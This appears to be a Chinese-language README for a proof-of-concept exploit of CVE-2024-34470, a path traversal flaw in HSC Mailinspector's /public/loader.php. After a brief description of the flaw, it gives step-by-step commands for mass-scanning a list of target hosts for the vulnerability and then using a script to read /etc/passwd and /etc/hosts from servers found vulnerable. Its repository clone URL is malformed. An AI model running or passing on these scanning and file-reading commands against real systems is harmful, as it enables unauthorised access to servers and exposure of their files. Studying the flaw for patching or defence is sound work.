在 HSC Mailinspector 5.2.18 及之前版本中发现了一个严重漏洞。该漏洞影响文件 /public/loader.php 中的一个未知功能。通过传递未知输入操作 'path' 参数会导致路径遍历漏洞。根据 CWE 分类,此问题属于 CWE-22。该产品使用外部输入构造路径名,旨在标识位于受限制父目录之下的文件或目录,但未能正确中和路径名中的特殊元素,导致路径名可能解析到限制目录之外的位置。这影响机密性、完整性和可用性。
克隆仓库:
git clone https://CVE-2024-34470.git
cd CVE-2024-34470
安装依赖
确保已安装 Python 和 pip。然后运行:
pip install -r requirements.txt
要使用文本文件对多个目标进行搜索,请使用脚本 Massive_CVE-2024-34470.py
$ python3 Massive_CVE-2024-34470.py urls.txt urls_vulnerable.txt 2>/dev/null
urls.txt 文件应遵循以下格式:
https://10.18.97.2
http://domain.com
https://192.8.7.2:4443
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_1.png)
确定存在漏洞的目标后,我们使用名为 CVE-2024-34470.py 的脚本来利用漏洞并通过终端显示指定的内容。
# 读取文件内容 passwd
$ python CVE-2024-34470.py http://example.com /etc/passwd 2>/dev/null
# 读取文件内容 hosts
$ python CVE-2024-34470.py http://example.com /etc/hosts
![[screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_2.png)